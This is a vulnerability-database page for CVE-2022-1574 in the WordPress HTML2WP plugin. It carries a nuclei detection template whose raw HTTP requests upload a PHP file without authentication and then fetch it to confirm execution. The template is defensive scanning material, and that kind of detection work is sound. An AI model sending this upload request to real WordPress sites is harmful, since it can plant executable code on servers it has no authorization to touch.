Lucene search
K

WordPress HTML2WP <=1.0.0 - Arbitrary File Upload

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

WordPress HTML2WP <=1.0.0 - Arbitrary File Upload vulnerability allows unauthenticated remote attackers to upload malicious files, leading to remote code execution or unauthorized access

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-1574
27 Jun 202209:15
attackerkb
Circl
CVE-2022-1574
20 Nov 202521:02
circl
CNNVD
WordPress plugin HTML2WP 代码问题漏洞
27 Jun 202200:00
cnnvd
CNVD
WordPress HTML2WP plugin arbitrary file upload vulnerability
30 Jun 202200:00
cnvd
CVE
CVE-2022-1574
27 Jun 202208:57
cve
Cvelist
CVE-2022-1574 HTML2WP <= 1.0.0 - Unauthenticated Arbitrary File Upload
27 Jun 202208:57
cvelist
NVD
CVE-2022-1574
27 Jun 202209:15
nvd
Patchstack
WordPress HTML2WP plugin <= 1.0.0 - Unauthenticated Arbitrary File Upload vulnerability
2 Jun 202200:00
patchstack
Prion
Cross site request forgery (csrf)
27 Jun 202209:15
prion
Positive Technologies
PT-2022-13973 · WordPress · Html2Wp
27 Jun 202200:00
ptsecurity
Rows per page
id: CVE-2022-1574

info:
  name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
  impact: |
    An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.
  remediation: |
    Update to the latest version of the plugin or remove it if not needed.
  reference:
    - https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
    - https://wordpress.org/plugins/html2wp/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1574
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1574
    cwe-id: CWE-352
    epss-score: 0.11866
    epss-percentile: 0.95582
    cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: html2wp_project
    product: html2wp
    framework: wordpress
  tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project,vuln,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 253
        Content-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990
        Connection: close

        -----------------------------7816508136577551742878603990
        Content-Disposition: form-data; name="local_importing[]"; filename="{{randstr}}.php"
        Content-Type: text/html

        <?php

        echo "File Upload success";

        -----------------------------7816508136577551742878603990--
      - |
        GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code_1 == 302"
          - "status_code_2 == 200"
          - "contains(body_2, 'File Upload success')"
        condition: and
# digest: 4a0a004730450220078f524a42c0695d15dd9621a24fc5c0d62338eb4a95f9b7da0ca1bab3f15d0b022100f7b24ae2f1b79d04715e03c8f61f7b8d56a26d25907307864d1bf29bf91fa836:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 27.5
CVSS 3.19.8
EPSS0.11866
31